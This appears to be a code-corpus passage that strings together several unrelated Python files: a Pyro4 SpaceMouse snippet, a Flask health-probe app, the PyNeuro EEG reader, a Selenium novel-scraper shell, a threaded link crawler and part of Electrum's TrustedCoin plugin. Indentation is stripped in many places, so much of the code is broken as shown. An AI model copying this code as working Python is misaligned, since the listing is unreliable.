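# module; the function name is hypothetical and nothing calls it). A separate
# process on the machine with the physical SpaceMouse could push its readings
# into the server above. "example.greeting" is the name registered in
# start_server(), and the dict keys mirror what get_action() reads. The
# publishing process also needs Pyro4.config.SERIALIZER = 'pickle' and a
# reachable name server so the numpy arrays can be transferred.
def example_remote_publisher():
    proxy = Pyro4.Proxy("PYRONAME:example.greeting")
    state = {
        "dpos": np.zeros(3),    # translation deltas; an ndarray, so xyz_remap indexing works
        "rotation": np.eye(3),  # unpacked but unused by get_action()
        "roll": 0.0, "pitch": 0.0, "yaw": 0.0,
        "grasp": False,         # read back as `accept`
        "reset": False,
    }
    # set_state() assigns the module-level `device_state` in the server process,
    # which is what get_state() (and therefore SpaceMouseExpert.get_action) returns.
    proxy.set_state(state)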
if __name__ == "__main__":
expert = SpaceMouseExpert()
for i in range(100):
time.sleep(1)
print(expert.get_action(None))
|
app.py
|
from __future__ import print_function
import os
import socket
INSTANCE = os.environ.get('HOSTNAME', socket.gethostname())
DELAY = float(os.environ.get('SHUTDOWN_DELAY', 10.0))
from flask import Flask
READYRET=('OK', 200)
LIVERET=('OK', 200)
application = Flask(__name__)
@application.route('/ws/ready')
def ready():
return READYRET
@application.route('/ws/live')
def live():
return LIVERET
@application.route('/ws/setready')
def setready():
global READYRET
READYRET=('OK', 200)
return 'OK'
@application.route('/ws/setlive')
def setlive():
global LIVERET
LIVERET=('OK', 200)
return 'OK'
@application.route('/ws/unsetready')
def unsetready():
global READYRET
READYRET=('NOK', 500)
return 'OK'
@application.route('/ws/unsetlive')
def unsetlive():
global LIVERET
LIVERET=('NOK', 500)
return 'OK'
@application.route('/')
def default():
    return 'Hello world!!!' + INSTANCE
import signal
import sys
import threading
import time
import os
try:
import Queue as queue
except ImportError:
import queue
from wsgiref.simple_server import make_server
wakeup = queue.Queue()
def killer():
delay = wakeup.get()
print('sleep', delay)
time.sleep(delay)
print('killing')
# os.kill(os.getpid(), signal.SIGKILL)
os._exit(os.EX_OK)
def handler(signum, frame):
global LIVERET, READYRET
print('signal', signum)
READYRET=('NOK', 500)
LIVERET=('NOK', 500)
wakeup.put(DELAY)
if __name__ == '__main__':
signal.signal(signal.SIGTERM, handler)
thread = threading.Thread(target=killer)
    thread.daemon = True
thread.start()
httpd = make_server('', 8080, application)
httpd.serve_forever()
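# Hedged usage sketch, added for illustration (the helper name is hypothetical
# and nothing calls it): how an external checker could drive the probe
# endpoints above. The URL mirrors make_server('', 8080, application).
def _example_probe_roundtrip(base="http://localhost:8080"):
    from urllib.request import urlopen
    print(urlopen(base + "/ws/ready").status)  # 200 while READYRET is ('OK', 200)
    urlopen(base + "/ws/unsetready").read()    # flip readiness to ('NOK', 500)
    try:
        urlopen(base + "/ws/ready")
    except Exception as exc:                   # urllib raises HTTPError on the 500
        print("not ready:", exc)
    urlopen(base + "/ws/setready").read()      # restore readiness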
|
PyNeuro.py
|
"""
@Author Zach Wang
@Date 2021.9.27
@Version 1.2.1
"""
import json
from telnetlib import Telnet
from threading import Thread
class PyNeuro:
"""NeuroPy libraby, to get data from neurosky mindwave.
    Initialising: object1 = PyNeuro()
    After initialising, set any required callbacks, then call the start method and
    the library will begin fetching data from the MindWave, i.e. object1.start().
    Similarly, the close method can be called to stop fetching data, i.e. object1.close().
    Requirements: Telnet (the ThinkGear Connector must be listening on localhost:13854).
    A short usage sketch (added for illustration) follows the class definition.
"""
__attention = 0
__meditation = 0
__blinkStrength = 0
__status = "NotConnected"
__delta = 0
__theta = 0
__lowAlpha = 0
__highAlpha = 0
__lowBeta = 0
__highBeta = 0
__lowGamma = 0
__highGamma = 0
__attention_records = []
__meditation_records = []
__blinkStrength_records = []
__packetsReceived = 0
__telnet = None
__attention_callbacks = []
__meditation_callbacks = []
__blinkStrength__callbacks = []
__delta__callbacks = []
__theta__callbacks = []
__status__callbacks = []
__lowAlpha__callbacks = []
__highAlpha__callbacks = []
__lowBeta__callbacks = []
__highBeta__callbacks = []
__lowGamma__callbacks = []
__highGamma__callbacks = []
    callBacksDictionary = {}  # keep track of all callbacks
def __init__(self):
self.__parserThread = None
self.__threadRun = False
self.__connected = False
def connect(self):
"""
Connect the TCP socket via Telnet.
"""
if self.__telnet is None:
self.__telnet = Telnet('localhost', 13854)
            self.__telnet.write(b'{"enableRawOutput": true, "format": "Json"}')
print("[PyNeuro] Connecting TCP Socket Host...")
def disconnect(self):
"""
Disconnect the TCP socket.
"""
if self.__telnet is not None:
self.__telnet.close()
print("[PyNeuro] Disconnect TCP Socket.")
def start(self):
"""
Start Service.
:return:
"""
self.__parserThread = Thread(target=self.__packetParser, args=())
self.__threadRun = True
self.__parserThread.start()
def close(self):
"""
Close Service.
:return:
"""
self.__threadRun = False
self.__parserThread.join()
def __packetParser(self):
try:
            while self.__threadRun:  # cleared by close() so the parser thread can exit
                line = self.__telnet.read_until(b'\r')
if len(line) > 20:
try:
raw_str = (str(line).rstrip("\\r'").lstrip("b'"))
data = json.loads(raw_str)
if "status" in data.keys():
if self.__status != data["status"]:
self.__status = data["status"]
if data["status"] == "scanning":
print("[PyNeuro] Scanning device..")
else:
print("[PyNeuro] Connection lost, trying to reconnect..")
else:
if "eSense" in data.keys():
print(data["eegPower"])
if data["eSense"]["attention"] + data["eSense"]["meditation"] == 0:
if self.__status != "fitting":
self.__status = "fitting"
print("[PyNeuro] Fitting Device..")
else:
if self.__status != "connected":
self.__status = "connected"
print("[PyNeuro] Successfully Connected ..")
self.attention = data["eSense"]["attention"]
self.meditation = data["eSense"]["meditation"]
self.theta = data['eegPower']['theta']
self.delta = data['eegPower']['delta']
self.lowAlpha = data['eegPower']['lowAlpha']
self.highAlpha = data['eegPower']['highAlpha']
self.lowBeta = data['eegPower']['lowBeta']
self.highBeta = data['eegPower']['highBeta']
self.lowGamma = data['eegPower']['lowGamma']
self.highGamma = data['eegPower']['highGamma']
self.__attention_records.append(data["eSense"]["attention"])
                                    self.__meditation_records.append(data["eSense"]["meditation"])
elif "blinkStrength" in data.keys():
self.blinkStrength = data["blinkStrength"]
self.__blinkStrength_records.append(data["blinkStrength"])
                    except Exception:
                        # Skip malformed packets rather than killing the parser thread.
                        pass
        except Exception:
print("[PyNeuro] Stop Packet Parser")
def set_attention_callback(self, callback):
"""
Set callback function of attention value
:param callback: function(attention: int)
"""
self.__attention_callbacks.append(callback)
def set_meditation_callback(self, callback):
"""
Set callback function of meditation value
:param callback: function(meditation: int)
"""
self.__meditation_callbacks.append(callback)
def set_blinkStrength_callback(self, callback):
"""
Set callback function of blinkStrength value
:param callback: function(blinkStrength: int)
"""
self.__blinkStrength__callbacks.append(callback)
def set_delta_callback(self, callback):
self.__delta__callbacks.append(callback)
def set_theta_callback(self, callback):
self.__theta__callbacks.append(callback)
def set_lowAlpha_callback(self, callback):
self.__lowAlpha__callbacks.append(callback)
def set_highAlpha_callback(self, callback):
self.__highAlpha__callbacks.append(callback)
def set_lowBeta_callback(self, callback):
self.__lowBeta__callbacks.append(callback)
def set_highBeta_callback(self, callback):
self.__highBeta__callbacks.append(callback)
def set_lowGamma_callback(self, callback):
self.__lowGamma__callbacks.append(callback)
def set_highGamma_callback(self, callback):
self.__highGamma__callbacks.append(callback)
# attention
@property
def attention(self):
"""Get value for attention"""
return self.__attention
@attention.setter
def attention(self, value):
self.__attention = value
# if callback has been set, execute the function
if len(self.__attention_callbacks) != 0:
for callback in self.__attention_callbacks:
callback(self.__attention)
# meditation
@property
def meditation(self):
"""Get value for meditation"""
return self.__meditation
@meditation.setter
def meditation(self, value):
self.__meditation = value
# if callback has been set, execute the function
if len(self.__meditation_callbacks) != 0:
for callback in self.__meditation_callbacks:
callback(self.__meditation)
# blinkStrength
@property
def blinkStrength(self):
"""Get value for blinkStrength"""
return self.__blinkStrength
@blinkStrength.setter
def blinkStrength(self, value):
self.__blinkStrength = value
# if callback has been set, execute the function
for callback in self.__blinkStrength__callbacks:
callback(self.__blinkStrength)
@property
def delta(self):
"""Get value for delta"""
return self.__delta
@delta.setter
def delta(self, value):
self.__delta = value
# if callback has been set, execute the function
for callback in self.__delta__callbacks:
callback(self.__delta)
@property
def theta(self):
"""Get value for theta"""
return self.__theta
@theta.setter
def theta(self, value):
self.__theta = value
# if callback has been set, execute the function
for callback in self.__theta__callbacks:
callback(self.__theta)
# lowBeta
# lowAlpha
@property
def lowAlpha(self):
"""Get value for lowAlpha"""
return self.__lowAlpha
@lowAlpha.setter
def lowAlpha(self, value):
self.__lowAlpha = value
# if callback has been set, execute the function
for callback in self.__lowAlpha__callbacks:
callback(self.__lowAlpha)
# highAlpha
@property
def highAlpha(self):
"""Get value for highAlpha"""
return self.__highAlpha
@highAlpha.setter
def highAlpha(self, value):
self.__highAlpha = value
# if callback has been set, execute the function
for callback in self.__highAlpha__callbacks:
callback(self.__highAlpha)
@property
def lowBeta(self):
"""Get value for lowBeta"""
return self.__lowBeta
@lowBeta.setter
def lowBeta(self, value):
self.__lowBeta = value
# if callback has been set, execute the function
for callback in self.__lowBeta__callbacks:
callback(self.__lowBeta)
# highBeta
@property
def highBeta(self):
"""Get value for highBeta"""
return self.__highBeta
@highBeta.setter
def highBeta(self, value):
self.__highBeta = value
# if callback has been set, execute the function
for callback in self.__highBeta__callbacks:
callback(self.__highBeta)
# lowGamma
@property
def lowGamma(self):
"""Get value for lowGamma"""
return self.__lowGamma
@lowGamma.setter
def lowGamma(self, value):
self.__lowGamma = value
# if callback has been set, execute the function
for callback in self.__lowGamma__callbacks:
callback(self.__lowGamma)
# highGamma
@property
def highGamma(self):
"""Get value for midGamma"""
return self.__highGamma
@highGamma.setter
def highGamma(self, value):
self.__highGamma = value
# if callback has been set, execute the function
for callback in self.__highGamma__callbacks:
callback(self.__highGamma)
# status
@property
def status(self):
"""Get status"""
return self.__status
@status.setter
def status(self, value):
self.__status = value
for callback in self.__status__callbacks:
callback(self.__status)
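

# --- Illustrative sketch (not part of the original file) ---
# The properties above all follow the same pattern: assigning to the attribute
# stores the value and then fans it out to every registered callback. A minimal,
# standalone version of that pattern (hypothetical names, for illustration only):
class _CallbackValueSketch:
    def __init__(self):
        self.__value = 0
        self.__callbacks = []

    def set_value_callback(self, callback):
        """Register a function(value: int) to be called on every update."""
        self.__callbacks.append(callback)

    @property
    def value(self):
        return self.__value

    @value.setter
    def value(self, new_value):
        self.__value = new_value
        for callback in self.__callbacks:  # notify every registered listener
            callback(new_value)

# Usage sketch: s = _CallbackValueSketch(); s.set_value_callback(print); s.value = 42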
|
scrapia_shell.py
|
"""
3) For missing novels, add the functionality to pause the code while it's running and scrape those missing novels first.
4) Sometimes `panels` in the `novel page` have different names for different novels; for them, create a json file for
storing what kind of a panel they have. For that, save it as "str type" and "int type" or simply hardcode that stuff...
5) Try to get the chapter no. from the current page; if it works, that should be the new value
of `CH_NO`. Why? We want to be consistent about exactly which chapters have been scraped, and this will help with that.
7) Add an option to update webdrivers automatically, make it a CLI option;
check out this tool https://pypi.org/project/webdriver-manager/
"""
# scrapia_world = Scrape wuxia world...
import threading
from cmd import Cmd
from sys import exit
from traceback import print_exc
from json import dump, load
from time import sleep # for timeouts, cuz' you don't wanna get your IP banned...
from platform import system as returnOSName
from click import clear, echo, Context
from selenium.common import exceptions
from sw_utils import clrScrn, colored
from scrapia_shell_helper import ScrapiaShellHelper
if returnOSName() == "Windows":
from sw_utils import colorama
colorama.init()
class ScrapiaShell(Cmd, ScrapiaShellHelper):
"""
Shell for scraping
TODO create a helper class that has methods of current class
that won't be shown in the interactive shell
TODO Create a NovelProfiler class or something as well
"""
# ctx will be used in the class that overrides this one
def __init__(self, isHeadless: int, novelName: str, ctx: Context):
self.toRead_dict: dict = {}
self.read_dict: dict = {}
msg = colored("Initialized ScrapiaShell", "green")
echo(msg)
Cmd.__init__(self)
self.ctx = ctx
self.isHeadless = isHeadless
self.SCRAPER_THREAD = threading.Thread(target=self.startScraping)
# using sys.exit will now kill this thread.
self.SCRAPER_THREAD.daemon = True
self.NOVEL = novelName
# To make sure certain functions run only after `setup` is invoked
self.is_ready: bool = False
self.saveSrc: bool = True # If set, we'll save as html instead.
# Reading from the json file
with open("novel_page_info.json", "r") as novel_page_fobj:
# Refer to the above json files to understand this mess
novel_page_dict: dict = load(novel_page_fobj)
self.NOVEL_PAGE_INFO: dict[str, str] = novel_page_dict["novel_page_info"][
novelName
]
# These will be used later on
self.CH_NO: int = 0
self.NOVEL_PATH = self.NOVEL_PAGE_INFO["NOVEL_PATH"].rstrip("/")
self.ACCORDIAN_TXT = self.NOVEL_PAGE_INFO["ACCORDIAN_TXT"]
# initialize here to avoid errors, as self.DATABASE is used after it
ScrapiaShellHelper.__init__(
self, self.NOVEL_PATH, novelName, self.ACCORDIAN_TXT
)
# create a DBHelper class and make NovelProfiler inherit it
self.mydb, self.cursor = self.getConAndCur(self.DATABASE)
self.CH_NO = self.getChapterNumberFrmDB(
self.mydb, self.cursor, self.TABLE, self.NOVEL
)
self.driver = self.setup_browser(self.GECKO_EXE_PATH, isHeadless)
self.prompt = colored(f"({self.NOVEL}) ", "red")
        self.intro = colored("Hi! Enter `help` for...well...help...", "green")  # Cmd shows self.intro when cmdloop() starts
def do_make_profile(self, *args) -> None:
greenColorNovelName = colored(self.NOVEL, "green")
echo(f"Starting profile creation for {greenColorNovelName}")
self.makeNovelProfile(self.driver, self.NOVEL_PAGE_INFO["NOVEL_PAGE"])
def do_nextPage(self, *args) -> None:
"""Finds and clicks the `Next` button"""
self.driver.execute_script(self.clickElementStartingWithStrS("span", "Next"))
def increment_ch_no(self, commitOnly: bool = False) -> None:
"""
- Default behaviour: Increment `CH_NO` by 1
- On setting `commit` to `True`: Don't increment, commit to database
NOTE set `commit` to `True` only when program is about to/ made to end
"""
if commitOnly:
con, cur = self.getConAndCur(self.DATABASE)
with con:
cur.execute(f"UPDATE {self.TABLE} SET {self.NOVEL}={self.CH_NO};")
return
self.CH_NO += 1
def scrape_gotoNextPage_sleep(self) -> None:
"""
(NOTE) Order matters here. After successfully scraping a page, it will go
to the next page and then sleep.
Giving enough time to the content to load.
"""
self.do_scrape()
self.do_nextPage()
sleep(int(self.cfg["PROJECT"]["SLEEP_TIME_AFTER_SCRAPE"]))
def startScraping(self) -> None:
"""
- `target` of `self.SCRAPER_THREAD` object.
- invoked by `self.do_start_scraping` in a thread.
"""
try:
if not self.is_ready:
self.do_setup()
self.read_dict, self.toRead_dict = self.readJsonsReturnDict()
indexList = list(self.toRead_dict.keys())
scrapeCount = 0
print("WHILE----------LOOP----------Initialized")
while self.toRead_dict:
self.scrape_gotoNextPage_sleep()
# updating the values
indexList, self.toRead_dict, self.read_dict = popFirstElementUpdateOtherDict(
indexList, self.toRead_dict, self.read_dict
)
scrapeCount += 1
if scrapeCount % 5 == 0:
self.increment_ch_no(commitOnly=True)
saveNovelProfile(self, self.toRead_dict, self.read_dict)
scrapeCount = 0
print("All present chapters scraped...\nEnding...")
self.do_end_cleanly()
saveNovelProfile(self, self.toRead_dict, self.read_dict)
except KeyboardInterrupt:
# save before ending
saveNovelProfile(self, self.toRead_dict, self.read_dict)
print("KEYBOARD----------INTERRUPT----------INVOKED")
self.do_end_cleanly()
return
except Exception:
saveNovelProfile(self, self.toRead_dict, self.read_dict)
print("----------ERROR----------")
print_exc()
self.do_end_cleanly()
return
def do_ch_no(self, *args) -> None:
"""Perform operations on `self.CH_NO`."""
option = str(input("(show/change)? ")).strip()
if option == "show":
print(self.CH_NO)
elif option == "change":
try:
self.CH_NO = int(input("New value: ").strip())
except Exception as e:
print(e, "Retry with a the correct value next time.", sep="\n")
return None
else:
print("Aborting!")
def do_cls(self, *args) -> None:
"""Clear screen"""
clrScrn(clear)
def do_commit(self, *args) -> None:
"""
- Commit current value of `self.CH_NO` to database.
NOTE you can change the value using `ch_no`"""
self.increment_ch_no(commitOnly=True)
def do_current_url(self, *args) -> None:
try:
echo(f"We are in: \t{self.driver.current_url}")
except Exception as e:
            echo(f"{e}\n\nTry invoking `setup` first")
return None
def do_get(self, *args):
"""Prompts for a url and invokes `self.__driver.get(<url>)`"""
url: str = input("Enter url: ").strip()
self.driver.get(url)
def do_end_cleanly(self, onlyDriverQuit: bool = False, *args):
"""Invoke two functions:
1) `increment_ch_no(commit=True)`
2) `driver.quit()`
Simply quits the driver if `onlyDriverQuit` is set to `True`.
NOTE
- `end_cleanly` does 'NOT' end the program execution
- just closes the browser and commits to db
"""
if onlyDriverQuit:
self.driver.quit()
return
# TODO Change code later
# don't take current_ch_no, take current index number
# which will be found using the profiler
current_ch_no: str = self.chapterNumberFromURL(
self.driver.current_url, return_as_is=True
)
if (
current_ch_no
): # we want to save the ch_no of the chapter we are presently in
self.CH_NO = int(current_ch_no)
self.increment_ch_no(commitOnly=True)
self.driver.quit()
def do_exit(self, *args) -> bool:
"""Exit the interactive shell"""
try:
if self.read_dict or self.toRead_dict:
saveNovelProfile(self, self.toRead_dict, self.read_dict)
if self.is_ready:
self.CH_NO = int(
self.chapterNumberFromURL(
self.driver.current_url, return_as_is=True
)
)
except ValueError:
pass
finally:
self.do_end_cleanly(onlyDriverQuit=not (self.is_ready))
exit() # This kills the daemon
def do_is_ready(self, show: bool = False, *args) -> None:
"""This is for manually telling the shell that we have now completed `setup`."""
if show:
print("This is the value of `self.is_ready`:", self.is_ready)
elif self.is_ready:
echo("It is already set to True!")
else:
self.is_ready = True
echo("Value has been set to True!")
def do_pr_pgsrc(self, *args):
"""Prints the page source to stdout"""
print(self.driver.page_source)
def do_reinitiate(self, *args) -> None:
"""Re-initiates the driver object for smoothly re-running from the terminal itself"""
option = input(
"THIS WILL CLOSE ANY RUNNING INSTANCES OF SELENIUM IN THIS THREAD\nCONTINUE? (y/n): "
)
if option == "y":
self.do_end_cleanly()
self.driver = self.setup_browser(self.GECKO_EXE_PATH, self.isHeadless)
else:
return None
def do_reinitiate_everything(self, *args) -> None:
"""This will re-initiate everything, including the shell class."""
option = input(
"THIS WILL CLOSE ANY RUNNING INSTANCES OF SELENIUM IN THIS THREAD\nCONTINUE? (y/n): "
)
if option == "y":
novel_name: str = input(f"{self.prompt}Enter novel name: ").strip()
self.do_end_cleanly()
self.__init__(self.isHeadless, novel_name, self.ctx)
def do_scrape(self, *args) -> None:
"""`scrape` does the following:\n
Get relevant content from the website and then save it in a file `NOVEL_SAVE_PATH`.\n
Increment the value of global variable `CH_NO` by one and output the title of the webpage scraped."""
if not self.is_ready:
echo("Can run only after `setup` is invoked!")
return None
        # from now on the chapters should be saved as `<last_part_of_url>.<file_ext>`
URL_LAST_PART: str = self.driver.current_url.rstrip("/").split("/")[-1]
# file_ext: str = "txt" # default value
file_ext = "html"
story_content = self.driver.page_source
# TODO save as f"Chapter-{customIndex}"
with open(f"{self.NOVEL_PATH}/{URL_LAST_PART}.{file_ext}", "w") as f:
f.write(story_content)
self.increment_ch_no()
print(f"{URL_LAST_PART} scraped successfully...\n")
# Setting up everything
def do_setup(self, *args) -> None:
"""This has something to do with the way the site is designed, go to any random chapter and inspect the page source
in the source a `div` has the `back button, the link to the novel page, the next button` (in this order)
what this code does is simply returns a list of the WebElement objects that refer to these elements respectively.
and since I know that I'm supposed to go to the next chapter, I simply choose the last element and click it."""
# TODO Change!!!
# You no longer need to open accordians and search for chapter names and shit
# Now simply fetch the latest link using novel profiler
# driver.get that link and start_scraping from there
try:
self.is_ready = True
echo("Installing addon...")
self.installAddon_cleanTabs_getLoginWindow(self.driver)
echo("Done. Sleeping for 2 seconds.")
sleep(2)
echo("logging in to website...")
self.loginToWebsite(self.driver)
echo("Done. Sleeping for 2 seconds.")
sleep(2)
# TODO put code to directly goto chapter, using indexed link
toRead_dict = self.readJsonsReturnDict()[1]
self.driver.get(toRead_dict[tuple(toRead_dict.keys())[0]][0])
self.driver.implicitly_wait(5)
# This is all it does.
# It's basically creating (or `setting up`) a scenario that makes scraping through the click method possible
except exceptions.NoSuchElementException as e:
print("EXCEPTION-----from self.do_setup")
print(e, "Try to invoke `start_scraping`", sep="\n\n")
except Exception as e:
self.is_ready = False
print(e, "FROM self.do_setup", sep="\n\n")
finally:
print(
"The start_scraping function should be working no matter what.",
"If you're having trouble with this function, consider manually going to the required chapter.",
"And invoking `start_scraping`, it should start scraping then.\n\n",
)
return
def do_start_scraping(self, *args):
"""This will run the `self.__start_scraping` helper function in a thread. This particular function also
deals with any function calls that might try to `start` the same thread again."""
try:
self.SCRAPER_THREAD.start()
except RuntimeError as e:
print(e, "The function is probably already running!", sep="\n")
return None
def saveNovelProfile(shellObj: ScrapiaShell, toRead_dict, read_dict):
"""
1) Open json files corresponding to the inputted dict objects
2) dump data in them
"""
with open(shellObj.retFilePath("toRead"), "w") as save_toReadFobj, open(
shellObj.retFilePath("read"), "w"
) as save_readFobj:
dump(toRead_dict, save_toReadFobj, indent=2)
dump(read_dict, save_readFobj, indent=2)
def popFirstElementUpdateOtherDict(keyList: list, *ds: dict | None):
"""
1) pop first element from d1
2) update d2 with popped element
3) pop first element from keyList
4) return elements in the order they were inputted
"""
d1, d2 = ds
if not d2:
d1.pop(keyList.pop(0))
else:
d2.update({keyList[0]: d1.pop(keyList.pop(0))})
return keyList, d1, d2
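

# --- Illustrative sketch (not part of the original file) ---
# A hedged example of how `popFirstElementUpdateOtherDict` behaves, based on its
# use in `startScraping`: the first to-read entry is moved into the read dict and
# its key is dropped from the index list. The chapter data below is made up.
def _pop_example():  # hypothetical helper, for illustration only
    to_read = {"ch-2": ["https://example.com/ch-2"], "ch-3": ["https://example.com/ch-3"]}
    read = {"ch-1": ["https://example.com/ch-1"]}  # non-empty, so the popped entry is moved into it
    keys = list(to_read.keys())
    keys, to_read, read = popFirstElementUpdateOtherDict(keys, to_read, read)
    # keys    -> ["ch-3"]
    # to_read -> {"ch-3": [...]}
    # read    -> {"ch-1": [...], "ch-2": [...]}
    # Note: when the second dict is empty, the current implementation simply drops
    # the popped entry instead of moving it, which may or may not be intended.
    return keys, to_read, read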
|
main.py
|
import threading
import time
import pymysql
from module.crawling import *
from module.input_processing import *
from module.save_db import *
class main_ctrler():
def __init__(self):
self.input = input_data("config/link_hunter.sample_input.txt", "config/link_hunter.config",
"config/link_hunter.patterns")
self.input.input_parser()
self.input.urls.reverse()
self.urls = self.input.urls
'''
self.urls = queue.Queue()
for url in self.input.urls:
self.urls.put_nowait(url)
'''
self.configs = self.input.configs
self.patterns = self.input.patterns
self.total_result = []
self.db = save_db(self.configs, self.patterns)
self.db.remove_table()
self.db.create_table()
def one_url_processor(self):
#url = self.urls.get()
url = self.urls.pop()
crawler = crawling(url, self.configs, self.patterns, self.db)
crawler.crawling_process()
print('==================================================')
self.total_result.extend(crawler.result)
def total_urls_processor(self):
self.threads = []
self.max_threads = 30
while self.threads or self.urls:
for thread in self.threads:
if not thread.is_alive():
self.threads.remove(thread)
while len(self.threads) < self.max_threads and self.urls:
thread = threading.Thread(target=self.one_url_processor)
                thread.daemon = True
thread.start()
self.threads.append(thread)
for element in self.total_result:
self.db.store_data(element[0], element[1], element[2], element[3], element[4], element[5])
self.db.db_close()
if __name__ == '__main__':
start_time = time.time()
app = main_ctrler()
app.total_urls_processor()
elapsed_time = time.time() - start_time
print(elapsed_time)
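

# --- Illustrative sketch (not part of the original file) ---
# total_urls_processor() above implements a simple bounded worker pool with plain
# threads: finished threads are reaped and new ones are started while work remains
# and the pool is below max_threads. A standalone version of that pattern, with a
# made-up work function, might look like this:
def _bounded_pool_sketch(jobs, max_threads=30):  # hypothetical helper, for illustration only
    def work(item):
        time.sleep(0.1)  # placeholder for the real per-URL crawling work
    workers = []
    while workers or jobs:
        workers = [t for t in workers if t.is_alive()]  # reap finished workers
        while len(workers) < max_threads and jobs:
            t = threading.Thread(target=work, args=(jobs.pop(),), daemon=True)
            t.start()
            workers.append(t)
        time.sleep(0.05)  # avoid busy-spinning (the original loop omits this)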
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum import ecc, constants, keystore, version, bip32, bitcoin
from electrum.bitcoin import TYPE_ADDRESS
from electrum.bip32 import BIP32Node, xpub_type
from electrum.crypto import sha256
from electrum.transaction import TxOutput
from electrum.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, UserFacingException
from electrum.storage import StorageEncryptionVersion
from electrum.network import Network
from electrum.base_wizard import BaseWizard, WizardWalletPasswordSetting
from electrum.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
